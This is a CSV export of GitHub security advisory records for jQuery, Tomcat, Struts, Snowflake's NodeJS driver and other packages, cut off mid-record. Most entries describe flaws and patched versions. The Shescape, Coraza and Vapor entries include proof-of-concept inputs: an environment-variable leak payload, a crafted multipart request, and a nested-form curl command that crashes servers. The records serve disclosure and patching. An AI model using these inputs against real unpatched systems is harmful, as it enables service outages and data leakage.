schema_version,id,modified,published,withdrawn,aliases,summary,details,severity,affected,references,database_specific 1.4.0,GHSA-257q-pv89-v3xv,2023-07-07T15:07:56Z,2023-06-26T21:30:58Z,,['CVE-2020-23064'],jQuery Cross Site Scripting vulnerability,Cross Site Scripting vulnerability in jQuery v.2.2.0 until v.3.5.0 allows a remote attacker to execute arbitrary code via the `` element.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jquery'}, 'ecosystem_specific': {'affected_functions': ['jquery.htmlPrefilter']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.3'}, {'fixed': '3.5.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'jQuery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.3'}, {'fixed': '3.5.0'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'jquery-rails'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'org.webjars.npm:jquery'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.3'}, {'fixed': '3.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-23064'}, {'type': 'WEB', 'url': 'https://github.com/jquery/jquery/commit/1d61fd9407e6fbe82fe55cb0b938307aa0791f77'}, {'type': 'WEB', 'url': 'https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/'}, {'type': 'PACKAGE', 'url': 'https://github.com/jquery/jquery'}, {'type': 'WEB', 'url': 'https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#410'}, {'type': 'WEB', 'url': 'https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#440'}, {'type': 'WEB', 'url': 'https://github.com/rails/jquery-rails/blob/v4.3.5/vendor/assets/javascripts/jquery3.js#L5979'}, {'type': 'WEB', 'url': 'https://github.com/rails/jquery-rails/blob/v4.4.0/vendor/assets/javascripts/jquery3.js#L6162'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2020-23064.yml'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JQUERY-565129'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-07T15:07:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-gx4r-fvwg-8678,2023-06-06T02:07:41Z,2023-06-05T18:30:27Z,,['CVE-2023-3109'],Admidio vulnerable to Cross-site Scripting,Cross-site Scripting (XSS) - Stored in GitHub repository admidio/admidio prior to 4.2.8.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'admidio/admidio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3109'}, {'type': 'WEB', 'url': 'https://github.com/admidio/admidio/commit/a7c211b835cafe1158932fbfcff9e5552e57510a'}, {'type': 'PACKAGE', 'url': 'https://github.com/admidio/admidio'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6fa6070e-8f7f-43ae-8a84-e36b28256123'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:07:41Z', 'nvd_published_at': None}" 1.4.0,GHSA-3g7p-8qhx-mc8r,2023-06-26T16:35:03Z,2023-06-22T20:01:39Z,,['CVE-2023-35931'],Shescape potential environment variable exposure on Windows with CMD,"### Impact This impact users of Shescape: 1. On Windows using the Windows Command Prompt (i.e. `cmd.exe`), and 2. Using `quote`/`quoteAll` or `escape`/`escapeAll` with the `interpolation` option set to `true`. An attacker may be able to get read-only access to environment variables. Example: ```javascript import * as cp from ""node:child_process""; import * as shescape from ""shescape""; // 1. Prerequisites const options = { shell: ""cmd.exe"", // Or shell: undefined, // Only if the default shell is CMD // And interpolation: true, // Only applies to `escape` and `escapeAll` usage } // 2. Attack (one of many) const payload = ""%PATH%""; // 3. Usage let escapedPayload; escapedPayload = shescape.quote(payload, options); // Or escapedPayload = shescape.quoteAll([payload], options); // Or escapedPayload = shescape.escape(payload, options); // Or escapedPayload = shescape.escapeAll([payload], options); // And (example) const result = cp.execSync(`echo Hello ${escapedPayload}`, options); // 4. Impact console.log(result.toString()); // Outputs ""Hello"" followed by the contents of the PATH environment variable ``` ### Patches This bug has been patched in [v1.7.1](https://github.com/ericcornelissen/shescape/releases/tag/v1.7.1) which you can upgrade to now. No further changes are required. ### Workarounds Alternatively, users can remove all instances of `%` from user input, either before or after using Shescape. ### References - Shescape Pull request [#982](https://github.com/ericcornelissen/shescape/pull/982) - Shescape commit [`d0fce70`](https://github.com/ericcornelissen/shescape/commit/d0fce70f987ac0d8331f93cb45d47e79436173ac) - Shescape Release [v1.7.1](https://github.com/ericcornelissen/shescape/releases/tag/v1.7.1) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'shescape'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/security/advisories/GHSA-3g7p-8qhx-mc8r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35931'}, {'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/pull/982'}, {'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/commit/d0fce70f987ac0d8331f93cb45d47e79436173ac'}, {'type': 'PACKAGE', 'url': 'https://github.com/ericcornelissen/shescape'}, {'type': 'WEB', 'url': 'https://github.com/ericcornelissen/shescape/releases/tag/v1.7.1'}]","{'cwe_ids': ['CWE-526'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:01:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-mppv-79ch-vw6q,2023-06-30T19:56:21Z,2023-06-21T12:30:19Z,,['CVE-2023-34981'],Apache Tomcat vulnerable to information leak,"A regression in the fix for bug 66512 in Apache Tomcat 11.0.0-M5, 10.1.8, 9.0.74 and 8.5.88 meant that, if a response did not include any HTTP headers no AJP SEND_HEADERS messare woudl be sent for the response which in turn meant that at least one AJP proxy (mod_proxy_ajp) would use the response headers from the previous request leading to an information leak.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0-M5'}, {'fixed': '11.0.0-M6'}]}], 'versions': ['11.0.0-M5']}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.1.8'}, {'fixed': '10.1.9'}]}], 'versions': ['10.1.8']}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.74'}, {'fixed': '9.0.75'}]}], 'versions': ['9.0.74']}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.88'}, {'fixed': '8.5.89'}]}], 'versions': ['8.5.88']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34981'}, {'type': 'WEB', 'url': 'https://bz.apache.org/bugzilla/show_bug.cgi?id=66512'}, {'type': 'WEB', 'url': 'https://bz.apache.org/bugzilla/show_bug.cgi?id=66591'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/j1ksjh9m9gx1q60rtk1sbzmxhvj5h5qz'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230714-0003/'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-10.html'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-11.html'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-8.html'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-9.html'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:06:39Z', 'nvd_published_at': None}" 1.4.0,GHSA-jhpr-j7cq-3jp3,2023-06-22T19:59:03Z,2023-06-22T19:59:03Z,,['CVE-2023-34110'],Flask-AppBuilder vulnerable to possible disclosure of sensitive information on user error,"### Impact An authenticated malicious actor with Admin privileges, could by adding a special character on the add, edit User forms trigger a database error, this error is surfaced back to this actor on the UI. On certain database engines this error can include the entire user row including the pbkdf2:sha256 hashed password. ### Patches Fixed on 4.3.2 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Flask-AppBuilder'}, 'ecosystem_specific': {'affected_functions': ['flask_appbuilder.models.sqla.interface.SQLAInterface.add', 'flask_appbuilder.models.sqla.interface.SQLAInterface.edit', 'flask_appbuilder.models.sqla.interface.SQLAInterface.delete', 'flask_appbuilder.models.sqla.interface.SQLAInterface.delete_all']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-jhpr-j7cq-3jp3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34110'}, {'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/pull/2045'}, {'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/commit/ae25ad4c87a9051ebe4a4e8f02aee73232642626'}, {'type': 'PACKAGE', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder'}, {'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/releases/tag/v4.3.2'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/flask-appbuilder/PYSEC-2023-94.yaml'}]","{'cwe_ids': ['CWE-209'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T19:59:03Z', 'nvd_published_at': None}" 1.4.0,GHSA-c2pj-v37r-2p6h,2023-08-25T21:35:14Z,2023-06-26T15:48:33Z,,['CVE-2023-40586'],Coraza has potential denial of service vulnerability,"### Summary Due to the misuse of `log.Fatalf`, the application using coraza crashed after receiving crafted requests from attackers. ### Details https://github.com/corazawaf/coraza/blob/82157f85f24c6107667bf0f686b71a72aafdf8a5/internal/bodyprocessors/multipart.go#L26-L29 The bodyprocessors of multipart uses `log.Fatalf` to handle errors from the `mime.ParseMediaType`, but `log.Fatalf` calls `os.Exit` directly after logging the error. https://github.com/golang/go/blob/a031f4ef83edc132d5f49382bfef491161de2476/src/log/log.go#L288-L291 This means that the application will immediately crash after receiving a malicious request that triggers an error in `mime.ParseMediaType`. ### PoC The server can be demonstrated by https://github.com/corazawaf/coraza/tree/main/examples/http-server After sending this request ``` POST / HTTP/1.1 Host: 127.0.0.1:8090 User-Agent: curl/8.1.2 Accept: */* Content-Length: 199 Content-Type: multipart/form-data; boundary=------------------------5fa6351b877326a1; a=1; a=2 Connection: close --------------------------5fa6351b877326a1 Content-Disposition: form-data; name=""file""; filename=""123"" Content-Type: application/octet-stream 123 --------------------------5fa6351b877326a1-- ``` The server will crash immediately. The `a=1; a=2` in `Content-Type` makes `mime: duplicate parameter name` error. ### Impact I believe the vulnerability was introduced by the following commit: https://github.com/corazawaf/coraza/commit/24af0c8cf4f10bab558740b595712be3b85493ec. ### Mitigation The error from `mime.ParseMediaType` should return directly.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/corazawaf/coraza/v3'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.1'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/corazawaf/coraza/v2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'last_affected': '2.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza/security/advisories/GHSA-c2pj-v37r-2p6h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40586'}, {'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza-caddy/issues/48'}, {'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza/commit/24af0c8cf4f10bab558740b595712be3b85493ec'}, {'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza/commit/a5239ba3ce839e14d9b4f9486e1b4a403dcade8c'}, {'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza/commit/e1b119b83e12c64f0957e00e8cad45a1b5f012f8'}, {'type': 'PACKAGE', 'url': 'https://github.com/corazawaf/coraza'}, {'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza/blob/82157f85f24c6107667bf0f686b71a72aafdf8a5/internal/bodyprocessors/multipart.go#L26-L29'}, {'type': 'WEB', 'url': 'https://github.com/corazawaf/coraza/releases/tag/v3.0.1'}, {'type': 'WEB', 'url': 'https://github.com/golang/go/blob/a031f4ef83edc132d5f49382bfef491161de2476/src/log/log.go#L288-L291'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-26T15:48:33Z', 'nvd_published_at': None}" 1.4.0,GHSA-q2fp-jw87-86px,2023-06-30T20:18:57Z,2023-06-22T12:30:14Z,,['CVE-2023-29931'],laravel-s vulnerable to Local File Inclusion,laravel-s prior to 3.7.36 is vulnerable to Local File Inclusion via `/src/Illuminate/Laravel.php`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'hhxsv5/laravel-s'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.36'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29931'}, {'type': 'WEB', 'url': 'https://github.com/hhxsv5/laravel-s/issues/437'}, {'type': 'WEB', 'url': 'https://github.com/hhxsv5/laravel-s/commit/05aa615527725f0b696da78ae4c7d3a5065bac6d'}, {'type': 'PACKAGE', 'url': 'https://github.com/hhxsv5/laravel-s'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T20:00:46Z', 'nvd_published_at': None}" 1.4.0,GHSA-hhqm-f4m4-pq39,2023-07-03T18:38:17Z,2023-06-23T12:30:18Z,,['CVE-2023-30260'],RaspAP raspap-webgui Command Injection vulnerability,Command injection vulnerability in RaspAP raspap-webgui 2.8.8 and earlier allows remote attackers to run arbitrary commands via crafted POST request to hostapd settings form.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'billz/raspap-webgui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30260'}, {'type': 'WEB', 'url': 'https://github.com/RaspAP/raspap-webgui/pull/1322'}, {'type': 'WEB', 'url': 'https://github.com/RaspAP/raspap-webgui/commit/238e1670fcef8b18ec4628ee74fc345607536a16'}, {'type': 'WEB', 'url': 'https://eldstal.se/advisories/230328-raspap.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/RaspAP/raspap-webgui'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:44:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-mm87-c3x2-6f89,2023-07-06T21:39:56Z,2023-06-29T12:30:24Z,,['CVE-2023-22886'],Apache Airflow JDBC Provider Improper Input Validation vulnerability,"Improper Input Validation vulnerability in Apache Software Foundation Apache Airflow JDBC Provider. Airflow JDBC Provider Connection’s [Connection URL] parameters had no restrictions, which made it possible to implement RCE attacks via different type JDBC drivers, obtain airflow server permission. This issue affects Apache Airflow JDBC Provider: before 4.0.0. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'apache-airflow-providers-jdbc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22886'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/airflow'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/ynbjwp4n0vzql0xzhog1gkp1ovncf8j3'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:40:04Z', 'nvd_published_at': None}" 1.4.0,GHSA-h53w-7qw7-vh5c,2023-06-09T22:53:51Z,2023-06-09T22:53:51Z,,['CVE-2023-34232'],Snowflake NodeJS Driver vulnerable to Command Injection,"### Issue Snowflake was informed via our bug bounty program of a command injection vulnerability in the Snowflake NodeJS driver via SSO browser URL authentication. ### Impacted driver package: snowflake-connector-nodejs ### Impacted version range: before [Version 1.6.21](https://community.snowflake.com/s/article/Node-js-Driver-Release-Notes) ### Attack Scenario In order to exploit the potential for command injection, an attacker would need to be successful in (1) establishing a malicious resource and (2) redirecting users to utilize the resource. The attacker could set up a malicious, publicly accessible server which responds to the SSO URL with an attack payload. If the attacker then tricked a user into visiting the maliciously crafted connection URL, the user’s local machine would render the malicious payload, leading to a remote code execution. This attack scenario can be mitigated through URL whitelisting as well as common anti-phishing resources. ### Solution On April 18, 2023, Snowflake merged a patch that fixed a command injection vulnerability in the Snowflake NodeJS driver via SSO browser URL authentication. The vulnerability affected the Snowflake NodeJS driver before Version 1.6.21. We strongly recommend users upgrade to Version 1.6.21 as soon as possible via the following resources: [Snowflake NodeJS Driver](https://docs.snowflake.com/en/developer-guide/node-js/nodejs-driver) ### Additional Information If you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'snowflake-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.21'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-nodejs/security/advisories/GHSA-h53w-7qw7-vh5c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34232'}, {'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-nodejs/pull/465'}, {'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-nodejs/commit/0c9622ae12cd7d627df404b73a783b4a5f60728a'}, {'type': 'WEB', 'url': 'https://community.snowflake.com/s/article/Node-js-Driver-Release-Notes'}, {'type': 'PACKAGE', 'url': 'https://github.com/snowflakedb/snowflake-connector-nodejs'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:53:51Z', 'nvd_published_at': None}" 1.4.0,GHSA-qvxg-wjxc-r4gg,2023-06-07T16:11:16Z,2023-06-07T16:11:16Z,,['CVE-2022-31019'],Vapor vulnerable to denial of service in URLEncodedFormDecoder,"Vapor is an HTTP web framework for Swift. Vapor versions earlier than 4.61.1 are vulnerable to a denial of service in the URLEncodedFormDecoder. ### Impact When using automatic content decoding, e.g. ```swift app.post(""foo"") { request -> String in let foo = try request.content.decode(Foo.self) return ""\(foo)"" } ``` An attacker can craft a request body that can make the server crash with the following request: ``` curl -d ""array[_0][0][array][_0][0][array]$(for f in $(seq 1100); do echo -n '[_0][0][array]'; done)[string][_0]=hello%20world"" http://localhost:8080/foo ``` The issue is unbounded, attacker controlled stack growth which will at some point lead to a stack overflow. ### Patches Fixed in 4.61.1 ### Workarounds If you don't need to decode Form URL Encoded data, you can disable the `ContentConfiguration` so it won't be used. E.g. in **configure.swift** ```swift var contentConfig = ContentConfiguration() contentConfig.use(encoder: JSONEncoder.custom(dates: .iso8601), for: .json) contentConfig.use(decoder: JSONDecoder.custom(dates: .iso8601), for: .json) contentConfig.use(encoder: JSONEncoder.custom(dates: .iso8601), for: .jsonAPI) contentConfig.use(decoder: JSONDecoder.custom(dates: .iso8601), for: .jsonAPI) ContentConfiguration.global = contentConfig ``` ### For more information If you have any questions or comments about this advisory: * Open an issue in [the Vapor repo](https://github.com/vapor/vapor) * Ask in [Vapor Discord](http://vapor.team)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/vapor/vapor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.61.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vapor/vapor/security/advisories/GHSA-qvxg-wjxc-r4gg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-31019'}, {'type': 'WEB', 'url': 'https://github.com/vapor/vapor/commit/6c63226a4ab82ce53730eb1afb9ca63866fcf033'}, {'type': 'PACKAGE', 'url': 'https://github.com/vapor/vapor'}]","{'cwe_ids': ['CWE-120', 'CWE-121', 'CWE-674'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-07T16:11:16Z', 'nvd_published_at': '2022-06-09T13:15:00Z'}" 1.4.0,GHSA-rv3x-xq3r-8j9h,2023-06-09T19:32:32Z,2023-06-09T19:32:32Z,,['CVE-2021-37634'],LeafKit allows XSS with untrusted user input,"### Impact This affects anyone passing unsanitised data to Leaf's variable tags. Before this fix, Leaf would not escape any strings passed to tags as variables. If an attacker managed to find a variable that was rendered with their unsanitised data, they could inject scripts into a generated Leaf page, which could enable XSS attacks if other mitigations such as a Content Security Policy were not enabled. ### Patches This has been patched in 1.3.0 ### Workarounds Sanitise any untrusted input before passing it to Leaf and enable a CSP to block inline script and CSS data. ### References https://github.com/vapor/leaf-kit-ghsa-rv3x-xq3r-8j9h/pull/1 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Leaf Kit](https://github.com/vapor/leaf-kit) * Email us at [security@vapor.codes](mailto:security@vapor.codes)",[],"[{'package': {'ecosystem': 'purl-type:swift', 'name': 'github.com/vapor/leaf-kit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vapor/leaf-kit/security/advisories/GHSA-rv3x-xq3r-8j9h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37634'}, {'type': 'PACKAGE', 'url': 'https://github.com/vapor/leaf-kit'}, {'type': 'WEB', 'url': 'https://github.com/vapor/leaf-kit/releases/tag/1.3.0'}]","{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T19:32:32Z', 'nvd_published_at': '2021-08-09T20:15:00Z'}" 1.4.0,GHSA-xhg5-42rf-296r,2023-06-16T17:53:30Z,2023-06-06T16:45:29Z,,['CVE-2023-33959'],notation-go's verification bypass can cause users to verify the wrong artifact,"### Impact An attacker who controls or compromises a registry can lead a user to verify the wrong artifact. ### Patches The problem has been fixed in the release [v1.0.0-rc.6](https://github.com/notaryproject/notation-go/releases/tag/v1.0.0-rc.6). Users should upgrade their notation-go library to [v1.0.0-rc.6](https://github.com/notaryproject/notation-go/releases/tag/v1.0.0-rc.6) or above. ### Workarounds User should use secure and trusted container registries. ### Credits The `notation` project would like to thank Adam Korczynski (@AdamKorcz) for responsibly disclosing the issue found during an security audit (facilitated by OSTIF and sponsored by CNCF) and Shiwei Zhang (@shizhMSFT), Pritesh Bandi (@priteshbandi) for root cause analysis. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/notaryproject/notation-go'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-rc.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/notaryproject/notation-go/security/advisories/GHSA-xhg5-42rf-296r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33959'}, {'type': 'WEB', 'url': 'https://github.com/notaryproject/notation-go/commit/39c8ed050a65cca3f3f308534acb612096735a64'}, {'type': 'WEB', 'url': 'https://github.com/notaryproject/notation-go/commit/eba60f5aed9c9e05dee55324423c95fe34700b4c'}, {'type': 'PACKAGE', 'url': 'https://github.com/notaryproject/notation-go'}, {'type': 'WEB', 'url': 'https://github.com/notaryproject/notation-go/releases/tag/v1.0.0-rc.6'}]","{'cwe_ids': ['CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T16:45:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-hp5w-w29m-vg63,2023-06-28T16:30:49Z,2023-06-21T09:30:15Z,,['CVE-2023-34340'],Apache Accumulo Improper Authentication vulnerability,"Improper Authentication vulnerability in Apache Software Foundation Apache Accumulo. This issue affects Apache Accumulo: 2.1.0. Accumulo 2.1.0 contains a defect in the user authentication process that may succeed when invalid credentials are provided. Users are advised to upgrade to 2.1.1. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.accumulo:accumulo-shell'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.1'}]}], 'versions': ['2.1.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34340'}, {'type': 'WEB', 'url': 'https://github.com/apache/accumulo/issues/3427'}, {'type': 'WEB', 'url': 'https://github.com/apache/accumulo/issues/3433'}, {'type': 'WEB', 'url': 'https://github.com/apache/accumulo/pull/3440'}, {'type': 'WEB', 'url': 'https://github.com/apache/accumulo/commit/0f2389735fd32e0bbc93ecde5d8c814b275b21b5'}, {'type': 'WEB', 'url': 'https://accumulo.apache.org/release/accumulo-2.1.1/'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/accumulo'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/syy6jftvy9l6tlhn33o0rzwhh4rd0z4t'}]","{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:06:51Z', 'nvd_published_at': None}" 1.4.0,GHSA-4g42-gqrg-4633,2023-06-21T21:47:38Z,2023-06-14T09:30:42Z,,['CVE-2023-34396'],Apache Struts vulnerable to memory exhaustion,"Denial of service via out of memory (OOM) owing to no sanity limit on normal form fields in multipart forms. When a Multipart request has non-file normal form fields, Struts used to bring them into memory as Strings without checking their sizes. This could lead to an OOM if developer has set struts.multipart.maxSize to a value equal or greater than the available memory. Upgrade to Struts 2.5.31 or 6.1.2.1 or greater ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.struts:struts2-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.31'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.struts:struts2-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.1.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34396'}, {'type': 'WEB', 'url': 'https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21'}, {'type': 'WEB', 'url': 'https://cwiki.apache.org/confluence/display/WW/S2-064'}, {'type': 'PACKAGE', 'url': 